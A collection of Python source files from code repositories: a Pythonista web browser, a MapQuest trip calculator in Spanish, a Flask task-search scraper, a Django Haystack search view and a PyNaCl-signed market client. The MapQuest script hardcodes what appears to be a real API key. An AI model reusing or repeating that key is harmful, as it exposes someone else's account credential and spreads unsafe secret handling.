name='bookmarks')\n\t\t\ttoolbar.superview.remove_subview(toolbar.superview['history'])\n\t\telse:\n\t\t\ttoolbar['clear'].hidden = False \n\t\t\ttoolbar['title'].text = 'History'\n\t\t\tdata_source = ui.ListDataSource(self.history[::-1])\n\t\t\ttv = self.list_bookmarks_and_history(data_source, width=320, height=toolbar.superview.height-toolbar.height, y=toolbar.height, name='history')\n\t\t\ttoolbar.superview['bookmarks'].hidden=True\n\t\t\ttoolbar.superview.remove_subview(toolbar.superview['bookmarks'])\n\t\tsender.superview.superview.add_subview(tv)\n\n\tdef list_bookmarks_and_history(self, data_source, **kwargs):\n\t\ttv = ui.TableView()\n\t\ttv.data_source = data_source\n\t\ttv.delegate = self\n\t\tfor k, v in kwargs.items():\n\t\t\tsetattr(tv, k, v)\n\t\treturn tv\n\n\tdef show_more_menu(self):\n\t\tpopup = ui.TableView()\n\t\tpopup.width = 250\n\t\tpopup.height = 500\n\t\tpopup.name = 'More'\n\t\tpopup.data_source = popup.delegate = self\n\t\tbutton = self['controlpanel']['more']\n\t\tpopup.present('popover', popover_location=(button.x, button.y+button.height))\n\n\tdef button_tapped(self, sender):\n\t\tif sender.name == 'favourite':\n\t\t\tif self.get_url() in self.bookmarks.values():\n\t\t\t\tself.remove_bookmark()\n\t\t\telse:\n\t\t\t\tself.save_bookmark()\n\t\telif sender.name == 'bookmarks':\n\t\t\tself.popup_menu()\n\t\telif sender.name == 'more':\n\t\t\tself.show_more_menu()\n\t\telse:\n\t\t\teval(\"self['webview'].{}()\".format(sender.name))\n\n\tdef tableview_number_of_rows(self, tableview, section):\n\t\tif tableview.name == 'Bookmarks':\n\t\t\treturn len(self.bookmarks)\n\t\telif tableview.name == 'More':\n\t\t\treturn 1\n\n\tdef tableview_cell_for_row(self, tableview, section, row):\n\t\tif tableview.name == 'Bookmarks':\n\t\t\tcell = ui.TableViewCell()\n\t\t\tcell.text_label.text = sorted(self.bookmarks.keys())[row]\n\t\t\tcell.image_view.image = ui.Image.named('ionicons-ios7-bookmarks-outline-32')\n\t\t\tcell.image_view.tint_color = '#66CCFF'\n\t\t\treturn cell\n\t\telif tableview.name == 'More':\n\t\t\tcell = ui.TableViewCell()\n\t\t\tcell.text_label.text = 'Settings'\n\t\t\tcell.image_view.image = ui.Image.named('ionicons-wrench-32')\n\t\t\treturn cell\n\n\t@ui.in_background\n\tdef tableview_did_select(self, tableview, section, row):\n\t\tif tableview.name == 'bookmarks':\n\t\t\turl = self.bookmarks[sorted(self.bookmarks.keys())[row]]\n\t\t\tself.load_url(url)\n\t\t\ttableview.superview.close()\n\t\telif tableview.name == 'history':\n\t\t\turl = tableview.data_source.items[row]\n\t\t\ttableview.superview.close()\n\t\t\tself.load_url(url)\n\t\telif tableview.name == 'More':\n\t\t\ttableview.close()\n\t\t\tconsole.hud_alert('No settings yet...', 'error', 1)\n\n\tdef tableview_can_delete(self, tableview, section, row):\n\t\treturn True\n\n\tdef tableview_delete(self, tableview, section, row):\n\t\titem = sorted(self.bookmarks.keys())[row]\n\t\tself.remove_bookmark(item)\n\t\ttableview.reload()\n\n\tdef textfield_did_begin_editing(self, textfield):\n\t\tself.addressbar_is_editing = True\n\t\tself.set_url()\n\t\tself['controlpanel']['reload'].hidden = True\n\n\tdef textfield_did_end_editing(self, textfield):\n\t\tself.addressbar_is_editing = False\n\t\tself['controlpanel']['reload'].hidden = False\n\t\tself.set_url()\n\n\tdef textfield_should_return(self, textfield):\n\t\turl = self['controlpanel']['addressbar'].text\n\t\tself.load_url(url)\n\t\ttextfield.end_editing()\n\t\treturn True\n\n\tdef webview_did_start_load(self, webview):\n\t\tself.webpage_has_loaded = False\n\n\tdef webview_did_finish_load(self, webview):\n\t\tif not self.addressbar_is_editing:\n\t\t\tself.set_url()\n\t\t\tself.webpage_has_loaded = True\n\t\tpage_is_bookmarked = unicode(self.get_url()) in self.bookmarks.values()\n\t\tself['controlpanel']['favourite'].image = self.favourite_images[page_is_bookmarked]\n\t\tself.save_history()\n\nview = 'ipad' if ui.get_screen_size()[0] >= 768 else 'iphone'\nbrowser = ui.load_view(view)\nbrowser.present(hide_title_bar=True, style='panel')\n","repo_name":"SebastianJarsve/Pythonista-Webbrowser","sub_path":"webbrowser.py","file_name":"webbrowser.py","file_ext":"py","file_size_in_byte":9330,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"57"} +{"seq_id":"12366714152","text":"import urllib.parse\nimport requests\n\nmain_api = \"https://www.mapquestapi.com/directions/v2/route?\"\nkey = \"D8mFbOQnyE4dMncs0E4ZAjnf3Dtdq8zr\"\nconsumo_combustible = 0.12 # Consumo estimado de combustible en litros por kilómetro\n\nwhile True:\n orig = input(\"Inicio de Viaje: \")\n dest = input(\"Fin del Viaje: \")\n\n if orig.lower() == \"s\" or dest.lower() == \"s\":\n break\n\n url = main_api + urllib.parse.urlencode({\"key\": key, \"from\": orig, \"to\": dest})\n response = requests.get(url)\n data = response.json()\n\n if data[\"info\"][\"statuscode\"] == 0:\n distancia = data[\"route\"][\"distance\"]\n duracion = data[\"route\"][\"formattedTime\"]\n\n duracion_horas, duracion_minutos, duracion_segundos = duracion.split(\":\")\n duracion_horas = int(duracion_horas)\n duracion_minutos = int(duracion_minutos)\n duracion_segundos = int(duracion_segundos)\n\n print(f\"Distancia: {distancia:.1f} km\")\n print(f\"Duración del viaje: {duracion_horas:02d} horas, {duracion_minutos:02d} minutos, {duracion_segundos:02d} segundos\")\n\n litros_necesarios = round(consumo_combustible * distancia, 2)\n print(f\"Litros necesarios: {litros_necesarios} L\")\n\n narrativa = f\"Viaje desde {orig} hasta {dest}:\\n\"\n narrativa += f\"- Distancia: {distancia:.2f} km\\n\"\n narrativa += f\"- Duración del viaje: {duracion_horas:02d} horas, {duracion_minutos:02d} minutos, {duracion_segundos:02d} segundos\\n\"\n narrativa += f\"- Litros necesarios: {litros_necesarios} L\\n\"\n\n with open(\"narrativa_viajes.txt\", \"a\") as file:\n file.write(narrativa)\n\n else:\n print(\"No se pudo calcular la ruta. Por favor, intenta nuevamente.\")\n","repo_name":"jocabrerah/Examen_Transversal_Programacion_y_Redes_Virtualizadas_DRY7122","sub_path":"script_medicion_viajes.py","file_name":"script_medicion_viajes.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"42563505583","text":"from flask import Flask, render_template, request\nimport constants\nfrom search_engine import SearchEngine\nfrom web_page import WebPage\nfrom pattern_matcher import PatternMatcher\nfrom suggester import Suggester\nimport pdb\napp = Flask(__name__)\napp.config.from_object(constants)\n\n@app.route(\"/\")\ndef index(name=None):\n return render_template(\"base.html\", name=name)\n\n@app.route(\"/search\", methods=[\"post\"])\ndef search():\n pages = search_by_google_or_bing(request)\n return render_template(\"results.tmpl\", items=pages)\n\n@app.route(\"/search_with_patterns\", methods=[\"post\"])\ndef search_with_patterns():\n query_present = request.form[\"query_present\"]\n query_past = request.form['query_past']\n query_words = request.form['query_words']\n pages = []\n # query_present => '骨折を治す', '猫を預ける'\n pages.extend(with_patterns_to_pages(query_present, 'で'))\n pages.extend(with_patterns_to_pages(query_present, 'に'))\n pages.extend(with_patterns_to_pages(query_present, 'から'))\n # query_past => '骨折が治った', '猫を預けた'\n pages.extend(with_patterns_to_pages(query_past, 'たら'))\n pages.extend(with_patterns_to_pages(query_past, 'で'))\n pages.extend(with_patterns_to_pages(query_past, 'て'))\n pages.extend(with_patterns_to_pages(query_past, 'に'))\n # result_pages = remove_same_keyword_tasks(pages)\n suggested_words = suggestions(query_words)\n return render_template(\"results_with_patterns.tmpl\", items=pages, suggestions=suggested_words)\n\n\ndef remove_same_keyword_tasks(pages):\n result_pages = pages\n for page in pages:\n for i in range(len(pages) - 2):\n # 自分自身と比較はしない\n if page.title == pages[i].title:\n continue\n # 自分自身以外と比較をして、同じキーワードならはじく\n if page.keyword == pages[i].keyword:\n result_pages.pop(i)\n return result_pages\n\n\ndef with_patterns_to_pages(query, word):\n # \"\"で厳密なマッチャで検索する。\n # word => \"で\", \"に\" など\n pm = PatternMatcher('\"' + word + query + '\"')\n pages = pm.bing_search()\n for page in pages:\n page.build_keyword(word + query)\n page.pattern_word = word\n page.query = query\n # page.keywordが''だったら最後に返すpageに入れない\n return [page for page in pages if page.keyword]\n\n\ndef suggestions(query):\n suggester = Suggester()\n suggester.suggest_with_query(query)\n return suggester.suggestions\n\n@app.route(\"/search_and_fetch_headings_and_li_texts\", methods=[\"post\"])\ndef search_and_fetch_headers():\n pages = search_by_google_or_bing(request)\n # 元ページほしい\n results = []\n for page in pages:\n page.fetch_html()\n page.build_heading_tree()\n\n # result[0] => top_nodes\n # result[0][0] => Node\n result = {'title': page.title, 'nodes': page.top_nodes, 'url': page.url}\n results.append(result)\n # results[0]['title'] => page.title\n return render_template(\"heading_blocks.tmpl\", results=results)\n\n\n@app.route('/scrape_from_nanapiand_build_heading_tree', methods=['post'])\ndef scrape_from_nanapi_and_build_heading_tree():\n query = request.form['query']\n head = 'http://nanapi.jp/search/q:'\n query_url = head + query\n nanapi_search_result_page = WebPage(query_url)\n nanapi_search_result_page.fetch_html()\n urls = nanapi_search_result_page.find_urls_from_nanapi_search_result()\n results = []\n for url in urls:\n # result_pageはnanapiの1記事\n result_page = WebPage(url)\n result_page.fetch_html()\n result_page.set_title()\n # task_steps => [task_step, task_step, ...]\n result_page.build_heading_tree()\n result = {'title': result_page.title, 'nodes': result_page.top_nodes, 'url': result_page.url}\n results.append(result)\n return render_template('headings_and_li_texts.tmpl', results=results)\n\n\ndef search_by_google_or_bing(request):\n query = request.form[\"query\"]\n search_engine_name = request.form['search_engine']\n search_engine = SearchEngine()\n if search_engine_name == 'google':\n pages = search_engine.google_search(query, 1)\n else:\n pages = search_engine.bing_search(query, 1)\n return pages\n\n\n@app.route('/find_related_action_words', methods=['post'])\ndef find_related_action_words():\n search_engine = SearchEngine()\n search_engine.action_word = request.form['action_word']\n search_engine.hint_word = request.form['hint_word']\n search_engine.find_related_action_words()\n search_engine.count_action_words()\n search_engine.sort_action_words_count()\n for elem in search_engine.sorted_action_words:\n elem['expanded_query'] = search_engine.action_word + ' ' + search_engine.hint_word + ' ' + elem['word']\n return render_template('find_related_action_words.tmpl', items=search_engine.result_pages, sorted_action_words=search_engine.sorted_action_words, found_pages=search_engine.material_pages, query=search_engine.actual_query)\n\n@app.route('/search_in_clueweb_with_expanded_query', methods=['post'])\ndef search_in_clueweb_with_expanded_query():\n search_engine = SearchEngine()\n search_engine.action_word = request.form['action_word']\n search_engine.hint_word = request.form['hint_word']\n search_engine.find_related_action_words_with_google()\n search_engine.count_action_words()\n search_engine.sort_action_words_count()\n search_engine.pick_sorted_action_words_more_than_1_count()\n results = []\n for elem in search_engine.sorted_action_words_more_than_1_count:\n elem['expanded_query'] = search_engine.action_word + ' ' + search_engine.hint_word + ' ' + elem['word']\n url = 'http://karen.dl.local:8983/solr/ClueWeb09ja/select?q=' + elem['expanded_query'] + '&wt=xml'\n web_page = WebPage(url)\n web_page.fetch_xml()\n web_page.pick_texts_to_result_pages()\n # クエリ1つごとに結果xmlページがある\n # 結果xmlページの内容を1ページずつWebPageオブジェクトにしてresult_pagesとして1クエリに対応する結果ページに持たせる\n for result_page in web_page.result_pages:\n # result_page.text_body\n result_page.set_lines_from_texts()\n result_page.set_line_nums_with_word(search_engine.action_word)\n result_page.set_line_nums_around_action_word()\n result_page.set_line_clusters_around_action_word()\n # web_page.result_pages[0].line_clusters_around_action_word\n results.append({'pages': web_page.result_pages, 'expanded_query': elem['expanded_query']})\n return render_template('search_in_clueweb_with_expanded_query.tmpl',\n results=results)\n\n@app.route('/find_words_with_yahoo_ads', methods=['post'])\ndef yahoo_sponsored_results():\n query = request.form['query']\n #yahooスポンサードサーチは単語ごとに区切るより一文にしたほうが広告出やすい\n head = 'http://search.yahoo.co.jp/search/ss?p='\n tail = '&ei=UTF-8&fr=top_ga1_sa&type=websearch&x=drt'\n url = head + query + tail\n y_ad_page = WebPage(url)\n y_ad_page.fetch_html()\n y_ad_page.fetch_ads()\n result_words = []\n key_phrases_of_ads = []\n Engine = SearchEngine()\n for ad in y_ad_page.ads:\n result_words.extend(ad.pick_nouns_and_verbs(ad.title))\n result_words.extend(ad.pick_nouns_and_verbs(ad.snippet))\n #key_phrases_of_ads.append(Engine.yahoo_key_phrase(ad.title))\n #key_phrases_of_ads.append(Engine.yahoo_key_phrase(ad.snippet))\n results = to_ranked_items(result_words)\n #return ad_template.render(items=results)\n return render_template('find_words_with_yahoo_ads.tmpl',\n items=results)\n\n@app.route('/find_matched_words_from_yahoo_ads', methods=['post'])\ndef find_matched_words_from_yahoo_ads():\n query = request.form['query']\n #yahooスポンサードサーチは単語ごとに区切るより一文にしたほうが広告出やすい\n head = 'http://search.yahoo.co.jp/search/ss?p='\n tail = '&ei=UTF-8&fr=top_ga1_sa&type=websearch&x=drt'\n url = head + query + tail\n y_ad_page = WebPage(url)\n y_ad_page.fetch_html()\n y_ad_page.fetch_ads()\n naradeha_results = []\n bracket_words = []\n for ad in y_ad_page.ads:\n ad.fetch_link_title()\n naradeha_results.extend(ad.pick_characteristic_words())\n bracket_words.extend(ad.pick_bracket_words())\n # naradeharesults => [{'なら': {'before': ['。', 'あの', '今石洋之']}}]\n # bracket_words => ['アスコルビン酸', 'メルトダウン']\n\n stop_words = ['公式', '楽天', '当日', 'お急ぎ便', 'ココ', 'ここ', 'これ', 'コレ', 'こちら', '公式', '購入', '人気', '詳細', '送料無料', '配送無料', '価格', '激安', '無料', 'アマゾン', 'ヤフオク', '0', '1', '2', '3']\n for num in range(0, 10):\n stop_words.append(str(num))\n results = naradeha_words_to_results(naradeha_results, stop_words)\n\n for bracket_word in bracket_words:\n is_including_stop_word = False\n for stop_word in stop_words:\n if stop_word in bracket_word:\n is_including_stop_word = True\n break\n if is_including_stop_word:\n continue\n results.append(bracket_word)\n\n return render_template('words.tmpl', words=results)\n\n\n@app.route('/scrape_from_nanapi', methods=['post'])\ndef scrape_from_nanapi():\n query = request.form['query']\n head = 'http://nanapi.jp/search/q:'\n query_url = head + query\n nanapi_search_result_page = WebPage(query_url)\n nanapi_search_result_page.fetch_html()\n urls = nanapi_search_result_page.find_urls_from_nanapi_search_result()\n tasks = []\n for url in urls:\n # result_pageはnanapiの1記事\n result_page = WebPage(url)\n result_page.fetch_html()\n # task_steps => [task_step, task_step, ...]\n task = result_page.find_task_from_nanapi_with_headings()\n # task_steps[0].h2 => 'はじめに'\n # task_steps[0].h3s[0] => 'はじめに'\n tasks.append(task)\n # tasks => [task, task, ...]\n # tasks[0][0].h2 => 'はじめに'\n return render_template('nanapi_tasks.tmpl', tasks=tasks)\n\n\n#https://www.google.com/search?as_q=flamenco&as_epq=&as_oq=&as_eq=&as_nlo=&as_nhi=&lr=&cr=&as_qdr=all&as_sitesearch=www.wikihow.com&as_occt=any&safe=images&as_filetype=&as_rights=\n\n\ndef naradeha_words_to_results(naradeha_results, stop_words):\n results = []\n for result in naradeha_results:\n for nara_de_ha in ['nara', 'de', 'ha']:\n for key in ['before', 'after']:\n if not result[nara_de_ha][key]:\n continue\n answer = ''.join(result[nara_de_ha][key])\n # beforeやafterが空白のとき\n is_including_stop_word = False\n for stop_word in stop_words:\n if stop_word in answer:\n is_including_stop_word = True\n break\n if is_including_stop_word:\n continue\n results.append(answer)\n return results\n\ndef to_ranked_items(items):\n rank_dict = {}\n #items => ['対策', '鼻炎', '対策', 'うるおい', ...]\n for item in items:\n if item in rank_dict.keys():\n rank_dict[item] += 1\n else:\n rank_dict[item] = 1\n #rank_dict => {'対策': 2, '鼻炎': 1, ...}\n keys = rank_dict.keys() # => ['対策', '鼻炎', ...]\n results = []\n for key in keys:\n count = rank_dict[key] # => 2\n result = {'name': key, 'count': count}\n results.append(result)\n #results => [{'name': '対策', 'count': 2}, ....]\n outputs = divide_by_count(results)\n return outputs\n\n\ndef divide_by_count(items):\n high_items = []\n middle_items = []\n low_items = []\n for item in items:\n if item['count'] > 2:\n high_items.append(item)\n elif item['count'] == 2:\n middle_items.append(item)\n else:\n low_items.append(item)\n outputs = []\n outputs.extend(high_items)\n outputs.extend(middle_items)\n outputs.extend(low_items)\n return outputs\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"katryo/task_search","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16426857580","text":"from django.conf import settings\nfrom django.contrib.auth.mixins import AccessMixin\nfrom django.shortcuts import redirect\nfrom haystack.generic_views import SearchView\nfrom django.utils.translation import ugettext_lazy as _\nfrom .search_forms import AninstanceSearchForm\nfrom aninstance_framework import helpers, auth\n\n\nclass AninstanceSearchView(AccessMixin, SearchView):\n \"\"\" NOTES\n Search:\n Django-haystock search files are located thus:\n - aninstance/whoosh_index (auto gen)\n - aninstance/templates/search/indexes/<AN_APP>/<MODEL>_text.txt\n - aninstance/templates/search/indexes/search.html\n - aninstance/search_forms.py\n - aninstance/<AN_APP>/search_indexes.py\n - aninstance/urls.py\n - Don't forget to add the model(s) to be searched in the CBV's \"MODELS_TO_SEARCH[]\" attribute,\n AND ALSO for granularity, add specific models to the \"get\" method of CBV to restrict model to search further,\n e.g.\n\n self.MODELS_TO_SEARCH = {\n 'view_accounts': ['invoicing.client'], # if url param is \"view_accounts\", search model invoicing.client\n }\n if 'q' in request.GET: # if request via the search button, 'q' will be in request.GET, so go to search url\n return redirect(self.search_url) # search_url is constructed in AninstanceGenericView & passed to CBVs\n\n - Certainly don't forget to query request.GET for 'q' (as above) and redirect to the search URL if present, as\n the request to the view was therefore coming in after the search button had been clicked.\n\n - Don't forget to set the results_url in AninstanceSearchView \"model_search_conf\" method (below)\n\n - Update index with: ./manage.py rebuild_index\n Auth:\n Auth in the same way as AninstanceGenericView & it's child CBVs.\n AccessMixin included here to provide self.handle_no_permission() method\n for use when auth fails. AninstanceGenericView does auth by overriding dispatch method,\n but here it's done in get(), to keep it simple.\n \"\"\"\n\n RESULTS_HEADING = 'Matching search results'\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.models = []\n self.result_url = None\n self.auth_required = False # false as default\n\n def get_queryset(self):\n queryset = super(AninstanceSearchView, self).get_queryset()\n ## further filter queryset based on some set of criteria\n return queryset\n\n def get_context_data(self, *args, **kwargs):\n context = super(AninstanceSearchView, self).get_context_data(**kwargs)\n context.update({'panel_heading': _('Search'),\n 'form': AninstanceSearchForm({'models': self.models}),\n 'result_url': self.result_url,\n 'results_heading': self.RESULTS_HEADING})\n # return the context\n return context\n\n def get(self, request, *args, **kwargs):\n \"\"\"\n Handles GET requests and instantiates a blank version of the form.\n \"\"\"\n # define specifics for model searches, including authorization if necessary\n # return redirect('search_view')\n if self.model_search_conf(request): # if authenticated or authentication not required\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n # update any session data (as this view not subclassing AninstanceGenericView, like normal)\n helpers.set_session_data(request)\n if form.is_valid():\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n else: # authentication was required but user not authenticated\n return self.handle_no_permission()\n\n def model_search_conf(self, request):\n # configs specific to each model search\n if 'models' in request.GET and 'q' in request.GET and not settings.DEMO:\n # # # CLIENT MODEL\n if helpers.phrase_check('invoicing.account')(request.GET.get('models')):\n self.result_url = '/invoicing/?action=view_account&id='\n return auth.Authenticate(request, level=auth.USER_LEVEL.get('staff')).auth()\n # # # INVOICE MODEL\n elif helpers.phrase_check('invoicing.invoice')(request.GET.get('models')):\n self.result_url = '/invoicing/?action=view_invoice&invoice_number='\n return auth.Authenticate(request, level=auth.USER_LEVEL.get('staff')).auth()\n # # # INVOICE ITEM MODEL\n elif helpers.phrase_check('invoicing.invoiceitem')(request.GET.get('models')):\n self.result_url = '/invoicing/?action=view_invoice_item&invoice_item_number='\n return auth.Authenticate(request, level=auth.USER_LEVEL.get('staff')).auth()\n # # # ANY OTHER MODEL NOT DEFINED ABOVE AS REQUIRING AUTHENTICATION TO SEARCH\n else:\n return True # authenticate request for anyone by default\n # if NO model chosen but a search query is being run, DO NOT authenticate\n elif 'q' in request.GET and 'models' not in request.GET:\n return False\n return True # authenticate requests as default where there are NO search queries (just display form)\n","repo_name":"UplandsDynamic/invoicing","sub_path":"aninstance_framework/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"57"} +{"seq_id":"4093718809","text":"\nimport pandas as pd\n\n\n# Crypto imports\nimport nacl.encoding\nimport nacl.signing\n\n\nclass MarketClient(object):\n # 'Market client class'\n\n def __init__(self):\n self.signingKey_hex = []\n self.verifyKey_hex = []\n\n def generateSignatureKeys(self):\n # Generate signature key pairs.\n\n # Create signing key\n signingKey = nacl.signing.SigningKey.generate()\n # Obtain the verify key for a given signing key\n verifyKey = signingKey.verify_key\n\n # Serialize the verify key to send it to a third party\n signingKey_hex = signingKey.encode(encoder=nacl.encoding.HexEncoder)\n verifyKey_hex = verifyKey.encode(encoder=nacl.encoding.HexEncoder)\n\n # Set as properties\n self.signingKey_hex = signingKey_hex.decode('UTF-8')\n self.verifyKey_hex = verifyKey_hex.decode('UTF-8')\n\n return signingKey_hex, verifyKey_hex\n\n def signMessage(self, msg: object, signingKey_hex: str) -> object:\n # Sign a message\n signingKey_bytes = b'%s' % str.encode(signingKey_hex, 'utf-8')\n # Generate signing key\n signingKey = nacl.signing.SigningKey(signingKey_bytes,\n encoder=nacl.encoding.HexEncoder)\n # Sign message\n signed = signingKey.sign(msg)\n return signed\n\n def verifyMessage(self, signature: bytes,\n signatureMsg: bytes,\n verifyKey_hex: str) -> object:\n # Verify message\n verifyKey = nacl.signing.VerifyKey(verifyKey_hex,\n encoder=nacl.encoding.HexEncoder)\n verified = verifyKey.verify(signatureMsg, signature=signature)\n return verified\n\n def signMarketTable(self, marketRow: object,\n previousMarketRow: object,\n signatureKey_hex: str) -> object:\n # Sign market row\n msg = \\\n str(marketRow.loc[0,'marketRootId']).encode(\"utf-8\")+\\\n str(marketRow.loc[0,'marketBranchId']).encode(\"utf-8\")+\\\n str(marketRow.loc[0, 'marketBranchId']).encode(\"utf-8\")+ \\\n str(marketRow.loc[0, 'marketMin']).encode(\"utf-8\") + \\\n str(marketRow.loc[0,'marketMax']).encode(\"utf-8\")+\\\n str(marketRow.loc[0, 'marketMax']).encode(\"utf-8\")+\\\n previousMarketRow.loc[0, 'signature'] + b'end'\n\n sig = self.signMessage(msg=msg, signingKey_hex=signatureKey_hex)\n newMarketRow = pd.DataFrame({'marketRootId': marketRow['marketRootId'],\n 'marketBranchId': marketRow['marketBranchId'],\n 'marketMin': marketRow['marketMin'],\n 'marketMax': marketRow['marketMax'],\n 'previousSig': previousMarketRow['signature'],\n 'signatureMsg': sig.message,\n 'signature': sig.signature,\n 'traderId': marketRow['traderId']})\n\n signedMarketTable = newMarketRow.reset_index(drop=True)\n return signedMarketTable\n\n def signOrderBook(self, orderRow: object,\n previousOrderRow: object,\n signatureKey_hex: str) -> object:\n # Sign previous signature (all columns in order up to previous signature)\n\n # Encode signature message in bytes\n msg =\\\n str(orderRow.loc[0,'tradeRootId']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'tradeBranchId']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'price']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'quantity']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'marketRootId']).encode('utf-8')+\\\n str(orderRow.loc[0,'marketBranchId']).encode(\"utf-8\")+\\\n str(orderRow.loc[0,'traderId']).encode(\"utf-8\")+\\\n previousOrderRow.loc[0,'signature'] + b'end'\n # Sign message\n sig = self.signMessage(msg=msg, signingKey_hex=signatureKey_hex)\n # Debugging chk that signature is correct\n chk = self.verifyMessage(signature=sig.signature, signatureMsg=msg,\n verifyKey_hex=self.verifyKey_hex)\n newOrderRow = pd.DataFrame({'tradeRootId': orderRow['tradeRootId'],\n 'tradeBranchId': orderRow['tradeBranchId'],\n 'price': orderRow['price'],\n 'quantity': orderRow['quantity'],\n 'marketRootId': orderRow['marketRootId'],\n 'marketBranchId': orderRow['marketBranchId'],\n 'traderId': orderRow['traderId'],\n 'previousSig': previousOrderRow['signature'],\n 'signatureMsg': sig.message,\n 'signature': sig.signature})\n # # Debugging check that orderRow has correct signature\n chk = newOrderRow['signature'] == bytes(sig.signature)\n signedOrderBook = newOrderRow\n return signedOrderBook\n\n def tradeMaker(self, prevTrade: object,\n tradeRow: object)->object:\n # Construct a signed trade package (primary/offset/match), possibly\n # for list of prices.\n\n if isinstance(tradeRow.loc[0,'price'], list):\n numPrices = len(tradeRow.loc[0,'price'])\n else:\n numPrices = 1\n\n tradeRootId = prevTrade.loc[0,'tradeRootId'] + 1\n # Sign trades\n pT = pd.DataFrame()\n oT = pd.DataFrame()\n mT = pd.DataFrame()\n for iPrice in range(numPrices):\n # Generate primary trade\n if isinstance(tradeRow.loc[0,'price'], list):\n price = float(tradeRow.loc[0,'price'][iPrice])\n else:\n price = float(tradeRow.loc[0,'price'])\n\n # Generate primary trade\n t = pd.DataFrame({'tradeRootId': [int(tradeRootId)],\n 'tradeBranchId': [int(1)],\n 'marketRootId': [int(tradeRow.loc[0,'marketRootId'])],\n 'marketBranchId': [int(tradeRow.loc[0,'marketBranchId'])],\n 'price': [price],\n 'quantity': [float(tradeRow.loc[0,'quantity'])],\n 'traderId': [int(tradeRow.loc[0,'traderId'])]})\n p = self.signOrderBook(orderRow=t, previousOrderRow=prevTrade,\n signatureKey_hex=self.signingKey_hex)\n chk = self.verifyMessage(signature=p.loc[0,'signature'],\n signatureMsg=p.loc[0,'signatureMsg'],\n verifyKey_hex=self.verifyKey_hex)\n pT = pd.concat([pT, p])\n # Generate offset trade\n o = t\n o = o.loc[:,['tradeRootId', 'tradeBranchId', 'marketRootId', 'marketBranchId', 'price', 'traderId']]\n o.loc[0,'quantity'] = t.loc[0,'quantity'] * -1\n o.loc[0,'tradeBranchId'] = int(2)\n o = self.signOrderBook(orderRow=o, previousOrderRow=p,\n signatureKey_hex=self.signingKey_hex)\n chk = self.verifyMessage(signature=o.loc[0,'signature'],\n signatureMsg=o.loc[0,'signatureMsg'],\n verifyKey_hex=self.verifyKey_hex)\n oT = pd.concat([oT, o])\n # Generate match trade\n m = o;\n m = m.loc[:,['tradeRootId', 'tradeBranchId', 'marketRootId', 'marketBranchId', 'price', 'traderId']]\n m.loc[0,'quantity'] = o.loc[0,'quantity'] * -1\n m.loc[0,'tradeBranchId'] = int(3)\n m = self.signOrderBook(orderRow=m, previousOrderRow=o,\n signatureKey_hex=self.signingKey_hex)\n chk = self.verifyMessage(signature=m.loc[0,'signature'],\n signatureMsg=m.loc[0,'signatureMsg'],\n verifyKey_hex=self.verifyKey_hex)\n mT = pd.concat([mT, m])\n\n tradePackage = pd.concat([pT, oT, mT]).reset_index(drop=True)\n\n return tradePackage\n\n def marketMaker(self, previousMarketRow: object,\n marketRow: object) -> object:\n # Construct a signed market row\n\n marketPackage = self.signMarketTable(marketRow=marketRow,\n previousMarketRow=previousMarketRow,\n signatureKey_hex=self.signingKey_hex)\n\n return marketPackage\n\n # Create functions for the 'client'. At present these pass in a MarketServer\n # object but a proper version they will send to a remote server somewhere.\n #\n # createUser_client()\n # createTrade_client()\n # createMarket_client()\n\n def createUser_client(self, marketServer=None):\n \"\"\"Wrapper for createUser from marketServer\"\"\"\n # When this is split out, create user by sending a post request to the\n # createUser() endpoint rather than to a local version of MarketServer.\n # (need to import requests)\n newUsr = marketServer.createUser(self.verifyKey_hex)\n return newUsr\n\n def createTrade_client(self, tradeRow:object, marketServer=None):\n \"\"\"\n Wrapper for createTrade from marketServer\n :param: tradeRow: (DataFrame) trade\n :param: marketServer: (MarketServer) market server\n\n :return allTradeChecks: (boolean) True if all trade checks pass\n :return colChk: (boolean) True if collateral checks pass\n\n Example::\n ms = MarketServer()\n mc = MarketClient()\n ...\n tradeRow = pd.DataFrame({'marketRootId': [1],\n 'marketBranchId': [1],\n 'price': [[0.5, 0.4]],\n 'quantity': [1],\n 'traderId': [1]})\n mc.createTrade_client(tradeRow=tradeRow, MarketServer = ms)\n \"\"\"\n prevTrade = marketServer.getPreviousTrade()\n tradePackage = self.tradeMaker(prevTrade=prevTrade,\n tradeRow=tradeRow).reset_index(drop=True)\n allTradeChks, colChk = marketServer.createTrade(tradePackage=tradePackage)\n return allTradeChks, colChk\n\n def createMarket_client(self, marketRow: object, marketServer=None):\n \"\"\"\n Wrapper for createMarket from marketServer.\n\n :param: marketRow: (DataFrame) market\n :param: marketServer: (MarketServer) market server\n\n :return: checks (bool) true if market created\n\n Example::\n ms = MarketServer()\n mc = MarketClient()\n ...\n marketRow = pd.DataFrame({'marketRootId': [1],\n 'marketBranchId': [1],\n 'marketMin': [0],\n 'marketMax': [0],\n 'traderId': [1]})\n mc.createMarket_client(marketRow=marketRow, MarketServer = ms)\n\n .. note::\n \"\"\"\n\n prevMarket = marketServer.getPreviousMarket()\n testMarket = self.marketMaker(prevMarket, marketRow)\n checks = marketServer.createMarket(newMarket=testMarket)\n return checks\n\n\n\n# - Think about splitting out mc/ms:\n# => Modify or split out MarketClient.createUser_client()/createTrade_client()/createMarket_client() so that instead of taking a\n# MarketServer object they just talk to the api endpoints for MarketServer.\n# =>\n\n","repo_name":"alpinechicken/blocmarket","sub_path":"previousversions/python/MarketObject/MarketClient.py","file_name":"MarketClient.py","file_ext":"py","file_size_in_byte":11611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} 